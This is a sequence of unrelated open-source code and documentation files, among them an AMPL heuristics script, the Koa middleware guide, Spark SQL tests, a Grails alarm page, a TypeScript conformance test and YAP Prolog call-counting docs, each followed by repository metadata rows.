s[k]=max{j in kmostused2[i+1]} s[j]} k};
param use2 := if w>0 then max{k in 0..N: sum{j in kmostused2[k]} a[j]<= w*A2} k;
param space2 {k in 0..N} := (sum{j in kmostused2[k]} a[j]) / A2;
set order2 ordered default {}; for {i in 1..N} let order2:=order2 union kmostused2[i];;
######## (H3) best selectivity/occurences ratio - bestes s_i/g_i
set kmostused3 {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused3[i+1] diff
{min{k in kmostused3[i+1]:
if g[k]>0 then s[k]/g[k] else 1 = max{j in kmostused3[i+1]} if g[j]>0 then s[j]/g[j] else 1} k};
param use3 := if w>0 then max{k in 0..N: sum{j in kmostused3[k]} a[j]<= w*A2} k;
param space3 {k in 0..N} := (sum{j in kmostused3[k]} a[j]) / A2;
set order3 ordered default {}; for {i in 1..N} let order3:=order3 union kmostused3[i];;
######## (H4) explicit solution via performance order
param S {i in 1..N,j in 1..Q:card(q[j] inter {i})=1} := prod{k in q[j]:s[k]<s[i]} s[k];
param p {i in 1..N} := (sum{j in 1..Q} if card(q[j] inter {i})=1 then b[j]*(dr-dd)*S[i,j]) + beta*(1-2*y[i]);
set kmostused4 {i in 0..N} := if i=0 then {} else if i=N then {ii in 1..N:g[ii]>0} else kmostused4[i+1] diff
{min{k in kmostused4[i+1]:
p[k]=max{j in kmostused4[i+1]} p[j]} k};
param use4 := if w>0 then max{k in 0..N: sum{j in kmostused4[k]} a[j]<= w*A2} k;
param space4 {k in 0..N} := (sum{j in kmostused4[k]} a[j]) / A2;
set order4 ordered default {}; for {i in 1..N} let order4:=order4 union kmostused4[i];;
######## (H1)-(H4) for a fixed single budget w ######
param performance_heu;
param performance_heu2;
param performance_heu3;
param performance_heu4;
param used_heu;
param used_heu2;
param used_heu3;
param used_heu4;
let w:= 0.2;
for {i in 1..N} let x[i]:=0; for {i in kmostused[use]} let x[i]:=1;
let performance_heu:= sum{j in 1..Q} b[j]*f[j];
let used_heu:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu, used_heu;
for {i in 1..N} let x[i]:=0; for {i in kmostused2[use2]} let x[i]:=1;
let performance_heu2:= sum{j in 1..Q} b[j]*f[j];
let used_heu2:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu2, used_heu2;
for {i in 1..N} let x[i]:=0; for {i in kmostused3[use3]} let x[i]:=1;
let performance_heu3:= sum{j in 1..Q} b[j]*f[j];
let used_heu3:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu3, used_heu3;
for {i in 1..N} let x[i]:=0; for {i in kmostused4[use4]} let x[i]:=1;
let performance_heu4:= sum{j in 1..Q} b[j]*f[j];
let used_heu4:=(sum{i in 1..N} a[i]*x[i])/A2;
display performance_heu4, used_heu4;
#end;
###### Strategies (H1)-(H4) for multiple budgets w ######
printf"" > results_out.txt;
for {k in 0..1 by 0.01} {let w:=k;
for {i in 1..N} let x[i]:=0; for {i in kmostused[use]} let x[i]:=1;
for {j in order diff kmostused[use]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu:= sum{j in 1..Q} b[j]*f[j];
let used_heu:=(sum{i in 1..N} a[i]*x[i])/A2;
for {i in 1..N} let x[i]:=0; for {i in kmostused2[use2]} let x[i]:=1;
for {j in order2 diff kmostused2[use2]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu2:= sum{j in 1..Q} b[j]*f[j];
let used_heu2:=(sum{i in 1..N} a[i]*x[i])/A2;
for {i in 1..N} let x[i]:=0; for {i in kmostused3[use3]} let x[i]:=1;
for {j in order3 diff kmostused3[use3]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu3:= sum{j in 1..Q} b[j]*f[j];
let used_heu3:=(sum{i in 1..N} a[i]*x[i])/A2;
for {i in 1..N} let x[i]:=0; for {i in kmostused4[use4]} let x[i]:=1;
for {j in order4 diff kmostused4[use4]} {
if a[j]+sum{i in 1..N} a[i]*x[i]<=w*A2 then let x[j]:=1; };
let performance_heu4:= sum{j in 1..Q} b[j]*f[j];
let used_heu4:=(sum{i in 1..N} a[i]*x[i])/A2;
printf"%4.4f %8.2f %1.6f %8.2f %1.6f %8.2f %1.6f %8.2f %1.6f\n", w,
performance_heu, used_heu, performance_heu2, used_heu2,
performance_heu3, used_heu3, performance_heu4, used_heu4 >> results_out.txt;
};
end;
| AMPL | 5 | hpi-epic/column_selection_example | column_selection_example.ampl | [
"MIT"
] |
/**
* ImmedLearner.x10
*
* Rudra Distributed Learning Platform
*
* Copyright (c) IBM Corporation 2016
* All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* 1. Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright notice,
* this list of conditions and the following disclaimer in the documentation
* and/or other materials provided with the distribution.
*
* 3. Neither the name of Rudra nor the names of its contributors may be used
* to endorse or promote products derived from this software without specific
* prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY,OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
package rudra;
import rudra.util.Logger;
import rudra.util.SwapBuffer;
import x10.util.concurrent.AtomicBoolean;
import x10.util.concurrent.Lock;
import x10.util.Team;
public class ImmedLearner(noTest:Boolean) extends Learner {
public def this(config:RudraConfig, confName:String, noTest:Boolean, spread:UInt,
nLearner:NativeLearner,
team:Team, logger:Logger, lt:Int, solverType:String) {
super(config, confName, spread, nLearner, team, logger, lt, solverType);
property(noTest);
}
// method called by reconciler thread.
val lock = new Lock();
def setTimeStamp(ts:UInt):void {
try {
lock.lock();
timeStamp = ts;
} finally {
lock.unlock();
}
}
def acceptGradientFromReconciler(g:TimedGradient) {
val includeMB = g.loadSize();
try {
lock.lock();
timeStamp = g.timeStamp;
} finally {
lock.unlock();
}
acceptGradients(g.grad, includeMB);
logger.info(()=>"Reconciler: delivered network gradient " + g + " to learner.");
}
def run(fromLearner:SwapBuffer[TimedGradient], done:AtomicBoolean) {
logger.info(()=>"Learner: started.");
var compG:TimedGradient = new TimedGradient(size);
compG.timeStamp = UInt.MAX_VALUE;
val testManager = (here.id==0) ? new TestManager(config, this.nLearner, noTest, solverType, lt) : null;
if (testManager != null) testManager.initialize();
val currentWeight = new TimedWeight(networkSize);
initWeights();
while (! done.get()) {
computeGradient(compG);
val loadSize = compG.loadSize();
compG=deliverGradient(compG, fromLearner);
// the reconciler will come in and update weights asynchronously
if (testManager != null) testManager.touch(loadSize);
} // while !done
if (testManager != null) testManager.finalize();
logger.info(()=>"Learner: Exited main loop.");
} //learner
}
// vim: shiftwidth=4:tabstop=4:expandtab
| X10 | 5 | milthorpe/rudra | x10/src/rudra/ImmedLearner.x10 | [
"BSD-3-Clause"
] |
# Guide
This guide covers Koa topics that are not directly API related, such as best practices for writing middleware and application structure suggestions. In these examples we use async functions as middleware - you can also use commonFunction or generatorFunction which will be a little different.
## Table of Contents
- [Guide](#guide)
- [Table of Contents](#table-of-contents)
- [Writing Middleware](#writing-middleware)
- [Middleware Best Practices](#middleware-best-practices)
- [Middleware options](#middleware-options)
- [Named middleware](#named-middleware)
- [Combining multiple middleware with koa-compose](#combining-multiple-middleware-with-koa-compose)
- [Response Middleware](#response-middleware)
- [Async operations](#async-operations)
- [Debugging Koa](#debugging-koa)
## Writing Middleware
Koa middleware are simple functions which return a `MiddlewareFunction` with signature (ctx, next). When
the middleware is run, it must manually invoke `next()` to run the "downstream" middleware.
For example if you wanted to track how long it takes for a request to propagate through Koa by adding an
`X-Response-Time` header field the middleware would look like the following:
```js
async function responseTime(ctx, next) {
const start = Date.now();
await next();
const ms = Date.now() - start;
ctx.set('X-Response-Time', `${ms}ms`);
}
app.use(responseTime);
```
If you're a front-end developer you can think any code before `next();` as the "capture" phase,
while any code after is the "bubble" phase. This crude gif illustrates how async function allow us
to properly utilize stack flow to implement request and response flows:

1. Create a date to track response time
2. Await control to the next middleware
3. Create another date to track duration
4. Await control to the next middleware
5. Set the response body to "Hello World"
6. Calculate duration time
7. Output log line
8. Calculate response time
9. Set `X-Response-Time` header field
10. Hand off to Koa to handle the response
Next we'll look at the best practices for creating Koa middleware.
## Middleware Best Practices
This section covers middleware authoring best practices, such as middleware
accepting options, named middleware for debugging, among others.
### Middleware options
When creating a public middleware, it's useful to conform to the convention of
wrapping the middleware in a function that accepts options, allowing users to
extend functionality. Even if your middleware accepts _no_ options, this is still
a good idea to keep things uniform.
Here our contrived `logger` middleware accepts a `format` string for customization,
and returns the middleware itself:
```js
function logger(format) {
format = format || ':method ":url"';
return async function (ctx, next) {
const str = format
.replace(':method', ctx.method)
.replace(':url', ctx.url);
console.log(str);
await next();
};
}
app.use(logger());
app.use(logger(':method :url'));
```
### Named middleware
Naming middleware is optional, however it's useful for debugging purposes to assign a name.
```js
function logger(format) {
return async function logger(ctx, next) {
};
}
```
### Combining multiple middleware with koa-compose
Sometimes you want to "compose" multiple middleware into a single middleware for easy re-use or exporting. You can use [koa-compose](https://github.com/koajs/compose)
```js
const compose = require('koa-compose');
async function random(ctx, next) {
if ('/random' == ctx.path) {
ctx.body = Math.floor(Math.random() * 10);
} else {
await next();
}
};
async function backwards(ctx, next) {
if ('/backwards' == ctx.path) {
ctx.body = 'sdrawkcab';
} else {
await next();
}
}
async function pi(ctx, next) {
if ('/pi' == ctx.path) {
ctx.body = String(Math.PI);
} else {
await next();
}
}
const all = compose([random, backwards, pi]);
app.use(all);
```
### Response Middleware
Middleware that decide to respond to a request and wish to bypass downstream middleware may
simply omit `next()`. Typically this will be in routing middleware, but this can be performed by
any. For example the following will respond with "two", however all three are executed, giving the
downstream "three" middleware a chance to manipulate the response.
```js
app.use(async function (ctx, next) {
console.log('>> one');
await next();
console.log('<< one');
});
app.use(async function (ctx, next) {
console.log('>> two');
ctx.body = 'two';
await next();
console.log('<< two');
});
app.use(async function (ctx, next) {
console.log('>> three');
await next();
console.log('<< three');
});
```
The following configuration omits `next()` in the second middleware, and will still respond
with "two", however the third (and any other downstream middleware) will be ignored:
```js
app.use(async function (ctx, next) {
console.log('>> one');
await next();
console.log('<< one');
});
app.use(async function (ctx, next) {
console.log('>> two');
ctx.body = 'two';
console.log('<< two');
});
app.use(async function (ctx, next) {
console.log('>> three');
await next();
console.log('<< three');
});
```
When the furthest downstream middleware executes `next();`, it's really yielding to a noop
function, allowing the middleware to compose correctly anywhere in the stack.
## Async operations
Async function and promise forms Koa's foundation, allowing
you to write non-blocking sequential code. For example this middleware reads the filenames from `./docs`,
and then reads the contents of each markdown file in parallel before assigning the body to the joint result.
```js
const fs = require('mz/fs');
app.use(async function (ctx, next) {
const paths = await fs.readdir('docs');
const files = await Promise.all(paths.map(path => fs.readFile(`docs/${path}`, 'utf8')));
ctx.type = 'markdown';
ctx.body = files.join('');
});
```
## Debugging Koa
Koa along with many of the libraries it's built with support the __DEBUG__ environment variable from [debug](https://github.com/visionmedia/debug) which provides simple conditional logging.
For example
to see all Koa-specific debugging information just pass `DEBUG=koa*` and upon boot you'll see the list of middleware used, among other things.
```
$ DEBUG=koa* node --harmony examples/simple
koa:application use responseTime +0ms
koa:application use logger +4ms
koa:application use contentLength +0ms
koa:application use notfound +0ms
koa:application use response +0ms
koa:application listen +0ms
```
Since JavaScript does not allow defining function names at
runtime, you can also set a middleware's name as `._name`.
This is useful when you don't have control of a middleware's name.
For example:
```js
const path = require('path');
const serve = require('koa-static');
const publicFiles = serve(path.join(__dirname, 'public'));
publicFiles._name = 'static /public';
app.use(publicFiles);
```
Now, instead of just seeing "serve" when debugging, you will see:
```
koa:application use static /public +0ms
```
| Markdown | 5 | VBetsun/koa | docs/guide.md | [
"MIT"
] |
include "stdio.sl";
include "sys.sl";
# TODO: [bug] suport numbers > 16-bit
var showstat = func(name) {
var statbuf = [0,0,0,0];
var n = stat(name, statbuf);
if (n < 0) {
fprintf(2, "stat: %s: %s\n", [name, strerror(n)]);
return 0;
};
var typch = 'f';
if (*statbuf == 0) typch = 'd';
printf("%c %u\t%u\t%u\t%s\n", [typch, statbuf[1], statbuf[2], statbuf[3], name]);
};
var args = cmdargs()+1;
if (!*args) {
fputs(2, "usage: stat NAME...\n");
exit(1);
};
while (*args) {
showstat(*args);
args++;
};
| Slash | 4 | jes/scamp-cpu | sys/stat.sl | [
"Unlicense"
] |
[Desktop Entry]
Name=Raiden
Version=XXVERSIONXX
Exec=raiden
Icon=raiden
Type=Application
StartupNotify=true
| desktop | 2 | karlb/raiden | docker/raiden.desktop | [
"MIT"
] |
-- test for misc functions
-- typeof
select typeof(null);
select typeof(true);
select typeof(1Y), typeof(1S), typeof(1), typeof(1L);
select typeof(cast(1.0 as float)), typeof(1.0D), typeof(1.2);
select typeof(date '1986-05-23'), typeof(timestamp '1986-05-23'), typeof(interval '23 days');
select typeof(x'ABCD'), typeof('SPARK');
select typeof(array(1, 2)), typeof(map(1, 2)), typeof(named_struct('a', 1, 'b', 'spark'));
-- Spark-32793: Rewrite AssertTrue with RaiseError
SELECT assert_true(true), assert_true(boolean(1));
SELECT assert_true(false);
SELECT assert_true(boolean(0));
SELECT assert_true(null);
SELECT assert_true(boolean(null));
SELECT assert_true(false, 'custom error message');
CREATE TEMPORARY VIEW tbl_misc AS SELECT * FROM (VALUES (1), (8), (2)) AS T(v);
SELECT raise_error('error message');
SELECT if(v > 5, raise_error('too big: ' || v), v + 1) FROM tbl_misc;
| SQL | 4 | kesavanvt/spark | sql/core/src/test/resources/sql-tests/inputs/misc-functions.sql | [
"BSD-2-Clause",
"Apache-2.0",
"CC0-1.0",
"MIT",
"MIT-0",
"ECL-2.0",
"BSD-3-Clause-No-Nuclear-License-2014",
"BSD-3-Clause"
] |
% A simple Hello Git implemented in MatLab
% also has a weird syntax
% or a very simple one
x = 'Hello Git'
disp(x) % ouputs Hello Git
% Going with the OOP style
classdef hello
methods
function greet(this)
disp('Hello Git')
end
end
end
| Matlab | 4 | bones97/Prog_langSyntax | Matlab.matlab | [
"Apache-2.0"
] |
FROM mhart/alpine-node:12
COPY . .
EXPOSE 8095
RUN yarn
RUN yarn build
CMD ["yarn", "start"]
| Dockerfile | 4 | ahmadiqbal1/vuetify | Dockerfile | [
"MIT"
] |
/*
* Copyright 2012-2021 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package org.springframework.boot.autoconfigure;
import java.util.List;
import org.junit.jupiter.api.Test;
import org.springframework.boot.autoconfigure.packagestest.one.FirstConfiguration;
import org.springframework.boot.autoconfigure.packagestest.two.SecondConfiguration;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;
import org.springframework.context.annotation.Configuration;
import static org.assertj.core.api.Assertions.assertThat;
import static org.assertj.core.api.Assertions.assertThatIllegalStateException;
/**
* Tests for {@link AutoConfigurationPackages}.
*
* @author Phillip Webb
* @author Oliver Gierke
*/
@SuppressWarnings("resource")
class AutoConfigurationPackagesTests {
@Test
void setAndGet() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(
ConfigWithAutoConfigurationPackage.class);
assertThat(AutoConfigurationPackages.get(context.getBeanFactory()))
.containsExactly(getClass().getPackage().getName());
}
@Test
void getWithoutSet() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(EmptyConfig.class);
assertThatIllegalStateException().isThrownBy(() -> AutoConfigurationPackages.get(context.getBeanFactory()))
.withMessageContaining("Unable to retrieve @EnableAutoConfiguration base packages");
}
@Test
void detectsMultipleAutoConfigurationPackages() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(FirstConfiguration.class,
SecondConfiguration.class);
List<String> packages = AutoConfigurationPackages.get(context.getBeanFactory());
Package package1 = FirstConfiguration.class.getPackage();
Package package2 = SecondConfiguration.class.getPackage();
assertThat(packages).containsOnly(package1.getName(), package2.getName());
}
@Test
void whenBasePackagesAreSpecifiedThenTheyAreRegistered() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(
ConfigWithAutoConfigurationBasePackages.class);
List<String> packages = AutoConfigurationPackages.get(context.getBeanFactory());
assertThat(packages).containsExactly("com.example.alpha", "com.example.bravo");
}
@Test
void whenBasePackageClassesAreSpecifiedThenTheirPackagesAreRegistered() {
AnnotationConfigApplicationContext context = new AnnotationConfigApplicationContext(
ConfigWithAutoConfigurationBasePackageClasses.class);
List<String> packages = AutoConfigurationPackages.get(context.getBeanFactory());
assertThat(packages).containsOnly(FirstConfiguration.class.getPackage().getName(),
SecondConfiguration.class.getPackage().getName());
}
@Configuration(proxyBeanMethods = false)
@AutoConfigurationPackage
static class ConfigWithAutoConfigurationPackage {
}
@Configuration(proxyBeanMethods = false)
@AutoConfigurationPackage(basePackages = { "com.example.alpha", "com.example.bravo" })
static class ConfigWithAutoConfigurationBasePackages {
}
@Configuration(proxyBeanMethods = false)
@AutoConfigurationPackage(basePackageClasses = { FirstConfiguration.class, SecondConfiguration.class })
static class ConfigWithAutoConfigurationBasePackageClasses {
}
@Configuration(proxyBeanMethods = false)
static class EmptyConfig {
}
}
| Java | 5 | techAi007/spring-boot | spring-boot-project/spring-boot-autoconfigure/src/test/java/org/springframework/boot/autoconfigure/AutoConfigurationPackagesTests.java | [
"Apache-2.0"
] |
--TEST--
bcpow() does not support exponents >= 2**63
--EXTENSIONS--
bcmath
--FILE--
<?php
try {
var_dump(bcpow('0', '9223372036854775808', 2));
} catch (\ValueError $e) {
echo $e->getMessage() . \PHP_EOL;
}
?>
--EXPECT--
bcpow(): Argument #2 ($exponent) is too large
| PHP | 3 | NathanFreeman/php-src | ext/bcmath/tests/bcpow_error2.phpt | [
"PHP-3.01"
] |
insert into book values(1, 'The Tartar Steppe');
insert into book values(2, 'Poem Strip');
insert into book values(3, 'Restless Nights: Selected Stories of Dino Buzzati'); | SQL | 3 | DBatOWL/tutorials | persistence-modules/spring-boot-persistence/src/test/resources/import_books.sql | [
"MIT"
] |
<%--
Copyright 2012 Netflix, Inc.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
--%>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="layout" content="main"/>
<title>${alarm.alarmName} Alarm</title>
</head>
<body>
<div class="body">
<h1>Alarm Details</h1>
<g:if test="${flash.message}">
<div class="message">${flash.message}</div>
</g:if>
<div class="buttons">
<g:form class="validate">
<input type="hidden" name="id" value="${alarm.alarmName}"/>
<g:link class="edit keep" action="edit" id="${alarm.alarmName}">Edit Alarm</g:link>
<g:buttonSubmit class="delete" action="delete" value="Delete Alarm" data-warning="Really delete Alarm '${alarm.alarmName}'?"/>
</g:form>
</div>
<div>
<table>
<tbody>
<tr class="prop">
<td class="name">Name:</td>
<td class="value">${alarm.alarmName}</td>
</tr>
<tr class="prop">
<td class="name">Policy:</td>
<td class="value">
<g:each var="policy" in="${policies}">
<div><g:linkObject type="scalingPolicy" name="${policy}"/></div>
</g:each>
</td>
</tr>
<tr class="prop">
<td class="name">Dimensions:</td>
<td class="value">
<g:render template="dimensions" model="[dimensions: alarm.dimensions,showAsgText: true]"/>
</td>
</tr>
<g:render template="alarmDetails" />
<tr class="prop">
<td class="name">State Value:</td>
<td class="value">${alarm.stateValue}</td>
</tr>
<tr class="prop">
<td class="name">State Reason:</td>
<td class="value">${alarm.stateReason}</td>
</tr>
<tr class="prop">
<td class="name">State Reason Data:</td>
<td class="value">${alarm.stateReasonData}</td>
</tr>
<tr class="prop">
<td class="name">State Updated Time:</td>
<td class="value"><g:formatDate date="${alarm.stateUpdatedTimestamp}"/></td>
</tr>
<tr class="prop">
<td class="name">Unit:</td>
<td class="value">${alarm.unit}</td>
</tr>
<tr class="prop">
<td class="name">Amazon Resource Locator (ARN):</td>
<td class="value">${alarm.alarmArn}</td>
</tr>
<tr class="prop">
<td class="name">Actions Enabled:</td>
<td class="value">${alarm.actionsEnabled}</td>
</tr>
<tr class="prop">
<td class="name">Actions:</td>
<td class="value">
<ul>
<g:each var="alarmAction" in="${alarm.alarmActions}">
<li>${alarmAction}</li>
</g:each>
</ul>
</td>
</tr>
<tr class="prop">
<td class="name">OK Actions:</td>
<td class="value">${alarm.getOKActions()}</td>
</tr>
<tr class="prop">
<td class="name">Insufficient Data Actions:</td>
<td class="value">${alarm.insufficientDataActions}</td>
</tr>
<tr class="prop">
<td class="name">Config Updated Time:</td>
<td class="value"><g:formatDate date="${alarm.alarmConfigurationUpdatedTimestamp}"/></td>
</tr>
</tbody>
</table>
</div>
</div>
</body>
</html>
| Groovy Server Pages | 3 | Threadless/asgard | grails-app/views/alarm/show.gsp | [
"Apache-2.0"
] |
// all of these are valid
var x: any;
var a: number = x;
var b: boolean = x;
var c: string = x;
var d: void = x;
var e = null;
e = x;
var f = undefined;
f = x;
enum E {
A
}
var g: E = x;
var g2 = E.A;
g2 = x;
class C {
foo: string;
}
var h: C = x;
interface I {
foo: string;
}
var i: I = x;
var j: { (): string } = x;
var j2: { <T>(x: T): string } = x;
module M {
export var foo = 1;
}
M = x;
function k<T>(a: T) {
a = x;
} | TypeScript | 3 | nilamjadhav/TypeScript | tests/cases/conformance/types/any/assignAnyToEveryType.ts | [
"Apache-2.0"
] |
/**
* @license
* Copyright Google LLC All Rights Reserved.
*
* Use of this source code is governed by an MIT-style license that can be
* found in the LICENSE file at https://angular.io/license
*/
// #docregion Reactive
import {Component} from '@angular/core';
import {FormControl, FormGroup} from '@angular/forms';
@Component({
selector: 'example-app',
template: `
<form [formGroup]="form">
<input type="radio" formControlName="food" value="beef" > Beef
<input type="radio" formControlName="food" value="lamb"> Lamb
<input type="radio" formControlName="food" value="fish"> Fish
</form>
<p>Form value: {{ form.value | json }}</p> <!-- {food: 'lamb' } -->
`,
})
export class ReactiveRadioButtonComp {
form = new FormGroup({
food: new FormControl('lamb'),
});
}
// #enddocregion
| TypeScript | 4 | raghavendramohan/angular | packages/examples/forms/ts/reactiveRadioButtons/reactive_radio_button_example.ts | [
"MIT"
] |
#version 120
// Input vertex attributes (from vertex shader)
varying vec2 fragTexCoord;
varying vec4 fragColor;
// Input uniform values
uniform sampler2D texture0;
uniform vec4 colDiffuse;
// NOTE: Add here your custom variables
uniform vec2 resolution = vec2(800, 450);
void main()
{
// Texel color fetching from texture sampler
vec4 texelColor = texture2D(texture0, fragTexCoord);
// NOTE: Implement here your fragment shader code
gl_FragColor = texelColor*colDiffuse;
} | F# | 4 | chrisws/raylib | examples/shaders/resources/shaders/glsl120/base.fs | [
"Zlib"
] |
extends RigidBody2D
var _picked = false
var _last_mouse_pos = Vector2.ZERO
func _ready():
input_pickable = true
func _input(event):
var mouse_event = event as InputEventMouseButton
if mouse_event and not mouse_event.pressed:
_picked = false
func _input_event(_viewport, event, _shape_idx):
var mouse_event = event as InputEventMouseButton
if mouse_event and mouse_event.pressed:
_picked = true
_last_mouse_pos = get_global_mouse_position()
func _physics_process(delta):
if _picked:
var mouse_pos = get_global_mouse_position()
if mode == MODE_STATIC:
global_position = mouse_pos
else:
linear_velocity = (mouse_pos - _last_mouse_pos) / delta
_last_mouse_pos = mouse_pos
| GDScript | 4 | jonbonazza/godot-demo-projects | 2d/physics_tests/utils/rigidbody_pick.gd | [
"MIT"
] |
(assert (str.suffixof "def" "abcdef"))
(check-sat)
| SMT | 3 | mauguignard/cbmc | regression/smt2_strings/suffixof_const_sat/suffixof_const_sat.smt2 | [
"BSD-4-Clause"
] |
%YAML 1.1
# ROS Dockerfile database
---
images:
ros-core:
base_image: @(os_name):@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_core_image.Dockerfile.em
entrypoint_name: docker_images/ros_entrypoint.sh
template_packages:
- docker_templates
ros_packages:
- ros-core
ros-base:
base_image: @(user_name):@(rosdistro_name)-ros-core-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- ros-base
bootstrap_ros_tools:
robot:
base_image: @(user_name):@(rosdistro_name)-ros-base-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- robot
perception:
base_image: @(user_name):@(rosdistro_name)-ros-base-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- perception
desktop:
base_image: @(user_name):@(rosdistro_name)-robot-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- desktop
desktop-full:
base_image: osrf/@(user_name):@(rosdistro_name)-desktop-@(os_code_name)
maintainer_name: @(maintainer_name)
template_name: docker_images/create_ros_image.Dockerfile.em
template_packages:
- docker_templates
ros_packages:
- desktop-full
| EmberScript | 3 | christophebedard/docker_images-1 | ros/noetic/ubuntu/focal/images.yaml.em | [
"Apache-2.0"
] |
/*************************************************************************
* *
* YAP Prolog *
* *
* Yap Prolog was developed at NCCUP - Universidade do Porto *
* *
* Copyright L.Damas, V.S.Costa and Universidade do Porto 1985-1997 *
* *
**************************************************************************
* *
* File: callcount.yap *
* Last rev: 8/2/02 *
* mods: *
* comments: Some profiling predicates available in yap *
* *
*************************************************************************/
/**
* @file callcount.yap
* @short support call counting.
*
* @defgroup Profiling Profiling Prolog Programs
* @brief the clock and the tick profilers.
* @ingroup extensions
* @{
*
* YAP includes two profilers. The count profiler keeps information on the
* number of times a predicate was called. This information can be used to
* detect what are the most commonly called predicates in the program. The
* count profiler can be compiled by setting YAP's flag profiling
* to `on`. The time-profiler is a `gprof` profiler, and counts
* how many ticks are being spent on specific predicates, or on other
* system functions such as internal data-base accesses or garbage collects.
*
* + Call_Counting
* +
*
*/
/**
@}
*/
/**
* @defgroup Call_Counting Counting Calls
* @ingroup Profiling
* @{
*
* Predicates compiled with YAP's flag call_counting set to
* `on` update counters on the numbers of calls and of
* retries. Counters are actually decreasing counters, so that they can be
* used as timers. Three counters are available:
*
* + `calls`: number of predicate calls since execution started or since
* system was reset;
* + `retries`: number of retries for predicates called since
* execution started or since counters were reset;
* + `calls_and_retries`: count both on predicate calls and
* retries.
*
* These counters can be used to find out how many calls a certain
* goal takes to execute. They can also be used as timers.
*
* The code for the call counters piggybacks on the profiling
* code. Therefore, activating the call counters also activates the profiling
* counters.
*
* These are the predicates that access and manipulate the call counters.
* */
:- system_module( '$_callcount', [call_count/3,
call_count_data/3,
call_count_reset/0], []).
:- use_system_module( '$_errors', ['$do_error'/2]).
/** @pred call_count_data(- _Calls_, - _Retries_, - _CallsAndRetries_)
*
*
* Give current call count data. The first argument gives the current value
* for the _Calls_ counter, next the _Retries_ counter, and last
* the _CallsAndRetries_ counter.
*
* */
call_count_data(Calls, Retries, Both) :-
'$call_count_info'(Calls, Retries, Both).
/** @pred call_count_reset
*
*
* Reset call count counters. All timers are also reset.
*
*/
call_count_reset :-
'$call_count_reset'.
/** @pred call_count(? _CallsMax_, ? _RetriesMax_, ? _CallsAndRetriesMax_)
*
*
* Set call counters as timers. YAP will generate an exception
* if one of the instantiated call counters decreases to 0:
*
* + _CallsMax_
*
* throw the exception `call_counter` when the
* counter `calls` reaches 0;
*
* + _RetriesMax_
*
* throw the exception `retry_counter` when the
* counter `retries` reaches 0;
*
* + _CallsAndRetriesMax_
*
* throw the exception
* `call_and_retry_counter` when the counter `calls_and_retries`
* reaches 0.
*
* YAP will ignore counters that are called with unbound arguments.
*
* Next, we show a simple example of how to use call counters:
*
* ~~~~~
*
* ?- yap_flag(call_counting,on),
* [-user].
* l :- l.
* end_of_file.
*
* yap_flag(call_counting,off).
*
* yes
*
* ?- catch(
* (call_count(10000,_,_),l),
* call_counter,format("limit_exceeded.~n",[])).
*
* limit_exceeded.
*
* yes
* ~~~~~
* Notice that we first compile the looping predicate `l/0` with
* call_counting `on`. Next, we catch/3 to handle an
* exception when `l/0` performs more than 10000 reductions.
*
*
*/
call_count(Calls, Retries, Both) :-
'$check_if_call_count_on'(Calls, CallsOn),
'$check_if_call_count_on'(Retries, RetriesOn),
